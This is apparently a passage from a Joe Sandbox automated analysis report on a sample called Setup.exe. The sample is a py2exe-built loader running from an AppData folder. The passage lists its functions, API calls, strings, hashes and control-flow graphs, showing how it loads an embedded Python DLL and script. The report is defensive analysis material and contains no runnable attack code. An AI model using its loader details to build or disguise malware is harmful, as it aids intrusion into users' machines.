                                                                                                                                                                                                            • Associated: 00000003.00000002.1936263598.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936383863.0000000000404000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936399440.0000000000405000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936454460.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressDebugHandleLibraryLoadModuleOutputProcString__iob_funcfprintf
                                                                                                                                                                                                            • String ID: undef symbol$undefined symbol %s -> exit(-1)
                                                                                                                                                                                                            • API String ID: 3232099167-3880521481
                                                                                                                                                                                                            • Opcode ID: a62e86013865cb6945eca6c9e6b857a4ad3fd4014c4c712411902039301153c0
                                                                                                                                                                                                            • Instruction ID: ec091370b392768ebba2b9cbd08fa3fa07ccb6f4dd854fbc632097c7e97f4075
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a62e86013865cb6945eca6c9e6b857a4ad3fd4014c4c712411902039301153c0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A11E2B16003029FEB216B699C487677798EFD4351F194437EA82F33B0D778DC958A18
                                                                                                                                                                                                            Function 00401350 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64fileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(C:\Users\user\AppData\Roaming\FeGIPCnK\common.bin,80000000,00000001,00000000,00000003,00000080,00000000,?,?,00401464,?), ref: 00401365
                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00401464,?,?,?,00401464,?), ref: 0040137F
                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00401392
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00401464,?), ref: 004013A1
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • C:\Users\user\AppData\Roaming\FeGIPCnK\common.bin, xrefs: 00401364
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936263598.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936383863.0000000000404000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936399440.0000000000405000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936454460.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Create$CloseHandleMappingSize
                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Roaming\FeGIPCnK\common.bin
                                                                                                                                                                                                            • API String ID: 3089540790-2908931457
                                                                                                                                                                                                            • Opcode ID: e8d0a1f2787124378ff6857ee086f689d906f27355de188c8710255d9154317e
                                                                                                                                                                                                            • Instruction ID: 01b989ff9adac1588cbd50fc37617142f0a4378e713b607962af627c2eb096ff
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e8d0a1f2787124378ff6857ee086f689d906f27355de188c8710255d9154317e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3017172B513107AF63056B8BC4AF9AA798D785B72F21063AFB11FA1D0D6B468005668

                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                            Function 00401540 Relevance: 33.3, APIs: 9, Strings: 10, Instructions: 91libraryloaderCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FindResourceA.KERNEL32(?,00000001,ZLIB.PYD), ref: 00401556
                                                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 00401562
                                                                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 00401571
                                                                                                                                                                                                              • Part of subcall function 00402520: _stricmp.MSVCR90(00000000,?,?,004056A8,?,00401D89,?,?,?,00000000,004014CF,?,00000000), ref: 0040253C
                                                                                                                                                                                                              • Part of subcall function 00402520: SetLastError.KERNEL32(0000000B,?,?,004056A8,?,00401D89,?,?,?,00000000,004014CF,?,00000000), ref: 0040255E
                                                                                                                                                                                                            • _snprintf.MSVCR90 ref: 004015C5
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 004015D3
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,initzlib), ref: 004015E3
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936263598.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936383863.0000000000404000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936399440.0000000000405000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936454460.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Resource$Load$AddressErrorFindLastLibraryLockProc_snprintf_stricmp
                                                                                                                                                                                                            • String ID: %s\%s$<pythondll>$<zlib.pyd>$C:\Users\user\AppData\Roaming\FeGIPCnK$C:\Users\user\AppData\Roaming\FeGIPCnK\common.bin$ZLIB.PYD$initzlib$initzlib$zlib.pyd$zlib.pyd
                                                                                                                                                                                                            • API String ID: 2010571536-3392275420
                                                                                                                                                                                                            • Opcode ID: ae8171121ff50720c6090cc407aa1a891991b12c19434c239d70883ea56e5c8f
                                                                                                                                                                                                            • Instruction ID: 80c5690bec49cf3331e261639d2591b172880e98f7e07ff1acb0629b34ba171b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae8171121ff50720c6090cc407aa1a891991b12c19434c239d70883ea56e5c8f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A21F7B1A4130177E62067606D4AFAB325C9F91B08F08043AFE06F92D0FA7DDA0485BE
                                                                                                                                                                                                            Function 004022C0 Relevance: 6.3, APIs: 5, Instructions: 60memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • free.MSVCR90 ref: 00402321
                                                                                                                                                                                                            • VirtualFree.KERNEL32(C0335F5D,00000000,00008000,?,00000000,004026C2,00000000), ref: 00402336
                                                                                                                                                                                                            • free.MSVCR90 ref: 00402344
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,004026C2,?,00000000,004026C2,00000000), ref: 0040234C
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00402353
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936263598.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936383863.0000000000404000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936399440.0000000000405000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936454460.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FreeHeapfree$ProcessVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2257755588-0
                                                                                                                                                                                                            • Opcode ID: 102b0e965b67371c3419661cfc3c5fb572f8875f49e51ae503116d5d03759085
                                                                                                                                                                                                            • Instruction ID: c191dbe27311920bbdec97b2ed2d5cc66810e61716ce78d940763c9d64f64ade
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 102b0e965b67371c3419661cfc3c5fb572f8875f49e51ae503116d5d03759085
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3115BB1600701ABD2309B65DD89B57B3A8BB84710F144939EA9AB72D0C7BCF845CA69
                                                                                                                                                                                                            Function 00401110 Relevance: 3.8, Strings: 3, Instructions: 32COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936263598.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936383863.0000000000404000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936399440.0000000000405000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936454460.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: _MessageBox$sys$windows_exe
                                                                                                                                                                                                            • API String ID: 0-3849625447
                                                                                                                                                                                                            • Opcode ID: fd65348d22b7d2e19ff4df5bd480cead7c4a5eac75bb3426842ad792d1667849
                                                                                                                                                                                                            • Instruction ID: 03ad9a0f995d2bc1cd443073b562689d5bf0c018f35825648ba9a12bb2c7fe2a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd65348d22b7d2e19ff4df5bd480cead7c4a5eac75bb3426842ad792d1667849
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48F082B1A41A009BD6117790AD0AF5F3358DB58704F100132FE02BF3E2E6B868449DEE
                                                                                                                                                                                                            Function 00402CAD Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00002C6B), ref: 00402CB2
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936263598.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936383863.0000000000404000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936399440.0000000000405000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936454460.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                            • Opcode ID: 9958a91c4ca027a0dd06e737d3769bf254095cad11251027f228ee6969ece57c
                                                                                                                                                                                                            • Instruction ID: 7bd2fd39c89f7d3508dfe89a34405372043ba1f6fa746baa291dd004a811b285
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9958a91c4ca027a0dd06e737d3769bf254095cad11251027f228ee6969ece57c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E99002B1A5560046D61017706F4D60925906A8C60B75204716301F44D4DAB44500555D
                                                                                                                                                                                                            Function 004013E0 Relevance: 31.6, APIs: 8, Strings: 10, Instructions: 93filestringCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FindResourceA.KERNEL32(?,00000001,PYTHON27.DLL), ref: 00401408
                                                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 00401414
                                                                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 0040141B
                                                                                                                                                                                                            • GetLastError.KERNEL32(Could not load python dll), ref: 0040143C
                                                                                                                                                                                                              • Part of subcall function 00401180: GetModuleFileNameA.KERNEL32(?,C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe,00000304,00401245,?,?,?,004018EB,?,?,00401A4C,00000000,?,0040111A,windows_exe), ref: 0040118F
                                                                                                                                                                                                              • Part of subcall function 00401180: GetLastError.KERNEL32(Retrieving module name,?,?,004018EB,?,?,00401A4C,00000000,?,0040111A,windows_exe), ref: 0040119E
                                                                                                                                                                                                              • Part of subcall function 00401350: CreateFileA.KERNELBASE(C:\Users\user\AppData\Roaming\FeGIPCnK\common.bin,80000000,00000001,00000000,00000003,00000080,00000000,?,?,00401464,?), ref: 00401365
                                                                                                                                                                                                            • strncmp.MSVCR90 ref: 00401478
                                                                                                                                                                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 00401499
                                                                                                                                                                                                            • _snprintf.MSVCR90 ref: 004014BD
                                                                                                                                                                                                            • GetLastError.KERNEL32(LoadLibrary(pythondll) failed), ref: 004014DB
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936263598.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936383863.0000000000404000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936399440.0000000000405000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936454460.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFileLastResource$CreateFindLoadLockModuleNameUnmapView_snprintfstrncmp
                                                                                                                                                                                                            • String ID: %s\%s$<pythondll>$C:\Users\user\AppData\Roaming\FeGIPCnK$C:\Users\user\AppData\Roaming\FeGIPCnK\common.bin$Could not load python dll$LoadLibrary(pythondll) failed$PYTHON27.DLL$PYTHON27.DLL$PYTHON27.DLL$PYTHON27.DLL
                                                                                                                                                                                                            • API String ID: 948983971-1477857133
                                                                                                                                                                                                            • Opcode ID: e5fa7c13f66c1b1b8e088db1ac7ea836e05937aadb5f2d225cdafa8ad45d128f
                                                                                                                                                                                                            • Instruction ID: 9a0feed5ddbe4cddfef8bd4aac7050c8a6037310be6a08d4b3341eb70d5cfa45
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e5fa7c13f66c1b1b8e088db1ac7ea836e05937aadb5f2d225cdafa8ad45d128f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9721C9B1A4070067E721B7B0AD0BB9B325C9F80B49F54043AFB45F51E1FABC9A0446AE
                                                                                                                                                                                                            Function 00401220 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 98COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FindResourceA.KERNEL32(?,00000001,PYTHONSCRIPT), ref: 0040122E
                                                                                                                                                                                                            • GetLastError.KERNEL32(Could not locate script resource:,?,?,004018EB,?,?,00401A4C,00000000,?,0040111A,windows_exe), ref: 00401251
                                                                                                                                                                                                              • Part of subcall function 00401180: GetModuleFileNameA.KERNEL32(?,C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe,00000304,00401245,?,?,?,004018EB,?,?,00401A4C,00000000,?,0040111A,windows_exe), ref: 0040118F
                                                                                                                                                                                                              • Part of subcall function 00401180: GetLastError.KERNEL32(Retrieving module name,?,?,004018EB,?,?,00401A4C,00000000,?,0040111A,windows_exe), ref: 0040119E
                                                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,004018EB,?,?,00401A4C,00000000,?,0040111A,windows_exe), ref: 00401267
                                                                                                                                                                                                            • GetLastError.KERNEL32(Could not load script resource:,?,?,004018EB,?,?,00401A4C,00000000,?,0040111A,windows_exe), ref: 00401276
                                                                                                                                                                                                              • Part of subcall function 00401000: FormatMessageA.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000), ref: 00401024
                                                                                                                                                                                                              • Part of subcall function 00401000: strncpy.MSVCR90 ref: 00401038
                                                                                                                                                                                                              • Part of subcall function 00401000: LocalFree.KERNEL32(?), ref: 00401046
                                                                                                                                                                                                              • Part of subcall function 00401000: lstrlenA.KERNEL32(00000000), ref: 00401058
                                                                                                                                                                                                              • Part of subcall function 00401000: _snprintf.MSVCR90 ref: 00401073
                                                                                                                                                                                                              • Part of subcall function 00401000: GetFocus.USER32 ref: 00401085
                                                                                                                                                                                                              • Part of subcall function 00401000: MessageBoxA.USER32(00000000), ref: 0040108C
                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,?,004018EB,?,?,00401A4C,00000000,?,0040111A,windows_exe), ref: 0040128B
                                                                                                                                                                                                            • GetLastError.KERNEL32(Could not lock script resource:,?,?,004018EB,?,?,00401A4C,00000000,?,0040111A,windows_exe), ref: 004012A4
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936263598.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936383863.0000000000404000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936399440.0000000000405000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936454460.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLast$Resource$Message$FileFindFocusFormatFreeLoadLocalLockModuleName_snprintflstrlenstrncpy
                                                                                                                                                                                                            • String ID: %s\%s$Bug: Invalid script resource$C:\Users\user\AppData\Roaming\FeGIPCnK$C:\Users\user\AppData\Roaming\FeGIPCnK\common.bin$Could not load script resource:$Could not locate script resource:$Could not lock script resource:$PYTHONSCRIPT
                                                                                                                                                                                                            • API String ID: 1129944797-1125715016
                                                                                                                                                                                                            • Opcode ID: b432dbf9351b12fe222823a8510b54283b5670730d38031d67c0957052b3a19f
                                                                                                                                                                                                            • Instruction ID: 7eba09b1a0f40aa0c84d07f7e295eb5ffc7ddc03588af27cd80fb795cb350761
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b432dbf9351b12fe222823a8510b54283b5670730d38031d67c0957052b3a19f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F62128B26442006FD7115B78BE0DB9B3758DB80769F06007BFF05F62F1E67988428A9D
                                                                                                                                                                                                            Function 004018E0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 114COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 101 4018e0-4018e5 102 4018e6 call 401220 101->102 103 4018eb-4018f0 102->103 104 4018f2-4018f8 103->104 105 4018f9-4018fa call 4013e0 103->105 107 4018ff-401904 105->107 107->104 108 401906-401910 107->108 109 401912-401943 __iob_func setbuf __iob_func setbuf __iob_func setbuf 108->109 110 401944-401956 getenv 108->110 109->110 111 401973-401979 110->111 112 401958-401971 getenv atoi 110->112 113 40197f-4019c2 call 401660 111->113 112->113 118 4019c4-4019cb call 4016f0 113->118 119 4019d5-4019dc call 4017d0 113->119 124 401a3b-401a3d 118->124 125 4019cd-4019d3 118->125 119->124 126 4019de-4019e4 119->126 125->126 127 4019e6-401a0a call 401540 126->127 128 401a0b-401a19 126->128 132 401a30-401a39 call 401540 128->132 133 401a1b-401a2d call 401c40 128->133 132->124 133->132
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00401220: FindResourceA.KERNEL32(?,00000001,PYTHONSCRIPT), ref: 0040122E
                                                                                                                                                                                                              • Part of subcall function 00401220: GetLastError.KERNEL32(Could not locate script resource:,?,?,004018EB,?,?,00401A4C,00000000,?,0040111A,windows_exe), ref: 00401251
                                                                                                                                                                                                            • __iob_func.MSVCR90 ref: 0040191B
                                                                                                                                                                                                            • setbuf.MSVCR90 ref: 00401924
                                                                                                                                                                                                            • __iob_func.MSVCR90 ref: 0040192B
                                                                                                                                                                                                            • setbuf.MSVCR90 ref: 00401931
                                                                                                                                                                                                            • __iob_func.MSVCR90 ref: 00401938
                                                                                                                                                                                                            • setbuf.MSVCR90 ref: 0040193E
                                                                                                                                                                                                            • getenv.MSVCR90 ref: 0040194F
                                                                                                                                                                                                            • getenv.MSVCR90 ref: 0040195D
                                                                                                                                                                                                            • atoi.MSVCR90 ref: 00401960
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936263598.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936383863.0000000000404000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936399440.0000000000405000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936454460.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: __iob_funcsetbuf$getenv$ErrorFindLastResourceatoi
                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe$PY2EXE_VERBOSE$PY2EXE_VERBOSE$frozen$frozen
                                                                                                                                                                                                            • API String ID: 2889461157-3899828694
                                                                                                                                                                                                            • Opcode ID: 6a41f32718c465f74dc13107b34463424df5baa3dd1c1489e4060c543bf3a866
                                                                                                                                                                                                            • Instruction ID: adff5b3d9cbd52ee3098cb8152bb6aaebbde8b1068d3032ab92f625a8504708a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a41f32718c465f74dc13107b34463424df5baa3dd1c1489e4060c543bf3a866
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 293163B1A012005BD7007BB5AE49B5B3AA8DF44349F154436FD05BB2F1E67AD810CEAE
                                                                                                                                                                                                            Function 00402520 Relevance: 21.2, APIs: 14, Instructions: 181memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 142 402520-40252b 143 40254c-40255a 142->143 144 40252d 142->144 146 402574-402580 143->146 147 40255c-40256a SetLastError 143->147 145 402533-402543 _stricmp 144->145 150 402545-40254a 145->150 151 40256b-402573 145->151 148 402592-4025ad VirtualAlloc 146->148 149 402582-402591 SetLastError 146->149 152 4025d3-40266d GetProcessHeap HeapAlloc _strdup VirtualAlloc * 2 memcpy call 401f60 148->152 153 4025af-4025c1 VirtualAlloc 148->153 150->143 150->145 157 40267a-402685 call 4023a0 152->157 158 40266f-402677 call 4020d0 152->158 153->152 154 4025c3-4025d2 SetLastError 153->154 163 4026b2-4026cc free call 4022c0 157->163 164 402687-402697 call 402010 157->164 158->157 169 4026d4-4026e0 call 401df0 164->169 170 402699-40269b 164->170 171 4026a7-4026b0 170->171 172 40269d-4026a5 SetLastError 170->172 171->163 176 4026cd 171->176 172->163 176->169
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • _stricmp.MSVCR90(00000000,?,?,004056A8,?,00401D89,?,?,?,00000000,004014CF,?,00000000), ref: 0040253C
                                                                                                                                                                                                            • SetLastError.KERNEL32(0000000B,?,?,004056A8,?,00401D89,?,?,?,00000000,004014CF,?,00000000), ref: 0040255E
                                                                                                                                                                                                            • SetLastError.KERNEL32(0000000B,?,?,?,004056A8,?,00401D89,?,?,?,00000000,004014CF,?,00000000), ref: 00402584
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,?,?,004056A8,?,00401D89,?,?,?,00000000,004014CF,?), ref: 004025A7
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,?,004056A8,?,00401D89,?,?,?,00000000,004014CF,?,00000000), ref: 004025BB
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000008,?,?,004056A8,?,00401D89,?,?,?,00000000,004014CF,?,00000000), ref: 004025C5
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000028,?,?,004056A8,?,00401D89,?,?,?,00000000,004014CF,?,00000000), ref: 004025D7
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,004056A8,?,00401D89,?,?,?,00000000,004014CF,?,00000000), ref: 004025DE
                                                                                                                                                                                                            • _strdup.MSVCR90(?,?,?,004056A8,?,00401D89,?,?,?,00000000,004014CF,?,00000000), ref: 00402606
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,00000000), ref: 00402625
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00402637
                                                                                                                                                                                                            • memcpy.MSVCR90(00000000,?,?), ref: 0040264A
                                                                                                                                                                                                            • SetLastError.KERNEL32(0000000B), ref: 0040269F
                                                                                                                                                                                                            • free.MSVCR90 ref: 004026B6
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936263598.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936383863.0000000000404000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936399440.0000000000405000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936454460.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Alloc$ErrorLastVirtual$Heap$Process_strdup_stricmpfreememcpy
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2469453545-0
                                                                                                                                                                                                            • Opcode ID: 5920acf7b4561dd90e574946742b47aa2b1a423a53400a6d9a2a9baf89e5df49
                                                                                                                                                                                                            • Instruction ID: e0f6c52df854575513d4d367151ecfb11016daf14cf6d7b4230d021fbf6e33ad
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5920acf7b4561dd90e574946742b47aa2b1a423a53400a6d9a2a9baf89e5df49
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C451B5B2601700AFD7209F68ED48B6B77A8EB84715F14453AFA45E72C1D7B5E8008B99
                                                                                                                                                                                                            Function 00401180 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46stringCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
